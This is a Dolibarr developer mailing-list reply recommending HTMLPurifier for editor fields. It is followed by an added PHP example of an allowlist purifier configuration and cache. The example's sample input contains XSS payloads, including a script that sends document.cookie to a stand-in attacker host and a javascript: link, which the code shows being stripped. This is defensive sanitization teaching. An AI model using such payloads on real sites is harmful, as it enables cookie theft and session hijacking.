> Hello there,
>
> I had a look at http://htmlpurifier.org. This library cleans up variables against the wished HTML tags.
>
> I think including this library in Dolibarr could greatly improve security, especially for fields where fckeditor is used.
I'll second that. I remember that when I suggested filtering input in Dolibarr 2, I was answered (at the time) that the users of Dolibarr were generally reliable and that there was no need for filtering. I hope this has changed :-)

We use HTMLPurifier in Chamilo LMS, with very good results, but beware that it is a *huge* CPU consumer. So much so that we actually had to disable some of its filtering features. I don't think it would impact Dolibarr much, as the number of simultaneous users is relatively low, but it's good to know.

Cheers,
Yannick

_______________________________________________
Dolibarr-dev mailing list
Dolibarr-dev@nongnu.org
https://lists.nongnu.org/mailman/listinfo/dolibarr-dev
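To make the proposal concrete, here is an added example of how an allowlist-based HTMLPurifier setup for editor-produced HTML might look, together with the definition cache that addresses the CPU cost mentioned above. This is illustrative code written for this page, not code from Dolibarr, Chamilo or the HTMLPurifier project; it assumes HTMLPurifier is installed through Composer (`vendor/autoload.php`), and the function names `buildPurifier` and `sanitizeDescription`, the tag allowlist and the sample input are all made up for the example.

```php
<?php
// Added example, not Dolibarr or HTMLPurifier project code.
// Assumption: HTMLPurifier installed via Composer (package ezyang/htmlpurifier).
require_once __DIR__ . '/vendor/autoload.php';

/**
 * Build a purifier restricted to the tags a rich-text editor such as
 * fckeditor legitimately produces. Anything outside the allowlist
 * (script elements, on* event handler attributes, javascript: URLs)
 * is dropped rather than escaped, so stored content stays renderable.
 */
function buildPurifier(string $cacheDir): HTMLPurifier
{
    $config = HTMLPurifier_Config::createDefault();
    $config->set('Core.Encoding', 'UTF-8');
    $config->set('HTML.Doctype', 'XHTML 1.0 Transitional');

    // Allowlist in element[attr|attr] syntax; hypothetical set chosen for
    // the example. Attributes not listed (onclick, style, ...) are removed.
    $config->set(
        'HTML.Allowed',
        'p,br,b,strong,i,em,u,ul,ol,li,h1,h2,h3,blockquote,'
        . 'a[href|title],img[src|alt|width|height],table,tr,td,th'
    );

    // Only these URI schemes survive in href/src; javascript:, data:, vbscript:
    // and friends are stripped.
    $config->set('URI.AllowedSchemes', ['http' => true, 'https' => true, 'mailto' => true]);

    // The expensive part of HTMLPurifier is building its HTML/CSS definition
    // objects. Serializing them to disk means that work happens once, not on
    // every request, which is the CPU cost the thread warns about.
    $config->set('Cache.SerializerPath', $cacheDir);

    return new HTMLPurifier($config);
}

/** Sanitize one editor-submitted field. Reuse the purifier across fields. */
function sanitizeDescription(HTMLPurifier $purifier, string $dirty): string
{
    return $purifier->purify($dirty);
}

// Constructed sample input for the example, not taken from any real record.
$dirty = '<p onmouseover="alert(1)">Invoice <b>#123</b></p>'
       . '<script>document.location="http://evil.example/?c="+document.cookie</script>'
       . '<a href="javascript:alert(document.cookie)">pay now</a>'
       . '<a href="https://example.com/pay">pay now</a>';

// Cache directory must be writable by the web server user and not web-exposed.
$cacheDir = sys_get_temp_dir() . '/htmlpurifier-cache';
if (!is_dir($cacheDir)) {
    mkdir($cacheDir, 0700, true);
}

$purifier = buildPurifier($cacheDir);
echo sanitizeDescription($purifier, $dirty), PHP_EOL;
```

Run from the command line, the output keeps the paragraph, the bold text and the https link, while the `onmouseover` handler, the `<script>` element and the `javascript:` URL are gone. Two practical points follow from the thread: create the purifier once per request rather than once per field, and make sure `Cache.SerializerPath` points at a persistent, writable directory, since without the cache every request pays the full definition-building cost that made the filter so heavy in Chamilo.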